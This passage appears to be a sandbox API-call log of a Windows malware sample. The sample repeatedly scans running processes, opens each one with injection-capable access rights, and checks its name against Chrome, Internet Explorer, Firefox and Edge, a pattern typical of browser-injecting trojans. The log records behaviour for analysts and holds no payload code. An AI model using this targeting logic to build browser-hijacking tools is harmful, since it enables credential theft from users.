	[0231.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.715] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.716] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0231.716] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa80) returned 0x6bbc
	[0231.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.717] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.717] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.717] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.717] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.718] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.718] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.718] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x6bc0
	[0231.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.719] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.719] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.719] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.720] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.720] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.720] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x6bc4
	[0231.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.721] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.721] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.721] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.721] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.722] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0231.722] CloseHandle (hObject=0x4fd0) returned 1
	[0231.722] Sleep (dwMilliseconds=0x64) 
	[0231.821] GetCurrentProcessId () returned 0x110
	[0231.821] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0231.825] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0231.827] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0231.828] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0231.830] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x6bc8
	[0231.830] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.830] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0231.831] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.831] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.831] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.831] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0231.832] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.832] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.833] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0231.834] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x6bcc
	[0231.834] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.834] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0231.834] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.834] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.834] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.834] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0231.835] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.835] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.835] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0231.836] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x6bd0
	[0231.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.836] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0231.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.836] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.836] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0231.837] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.837] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.837] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0231.838] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x6bd4
	[0231.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.838] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0231.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.838] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.838] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0231.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.839] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.839] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0231.840] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x6bd8
	[0231.840] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.840] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0231.840] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.840] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.840] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.840] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0231.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.841] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.841] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0231.842] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x6bdc
	[0231.842] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.842] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0231.842] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.842] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.842] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.842] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0231.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.843] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.843] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0231.844] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x6be0
	[0231.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.844] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0231.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.844] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.844] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0231.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.845] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.845] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0231.846] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x6be4
	[0231.846] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.846] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0231.846] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.846] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.846] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.846] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0231.846] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.846] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.847] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.847] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x6be8
	[0231.847] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.847] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.848] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.849] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.849] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.849] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.850] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x6bec
	[0231.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.850] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.850] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.850] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.851] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.851] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.851] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.851] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.852] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x6bf0
	[0231.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.852] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.852] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.852] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.853] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.853] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.853] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.853] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.854] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x6bf4
	[0231.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.854] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.854] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.854] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.855] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.855] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.855] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.856] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.857] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x6bf8
	[0231.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.857] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.857] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.857] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.858] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.858] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.858] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.858] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.859] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x6bfc
	[0231.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.859] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.859] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.859] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.860] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.860] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.860] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.860] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.861] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x6c00
	[0231.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.861] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.861] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.862] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.862] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.862] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.862] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0231.863] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x6c04
	[0231.863] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.864] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0231.864] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.864] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.864] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.864] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0231.865] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.865] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.865] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.866] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x6c08
	[0231.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.866] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.866] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.866] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.866] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.867] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.867] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0231.868] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x6c0c
	[0231.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.868] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.868] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.868] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.869] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.869] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.869] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0231.870] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x6c10
	[0231.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.870] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0231.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.871] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.871] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0231.872] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.872] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.872] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.872] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x6c14
	[0231.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.873] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.873] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.873] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.874] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.874] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0231.874] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x6c18
	[0231.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.875] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0231.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.875] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
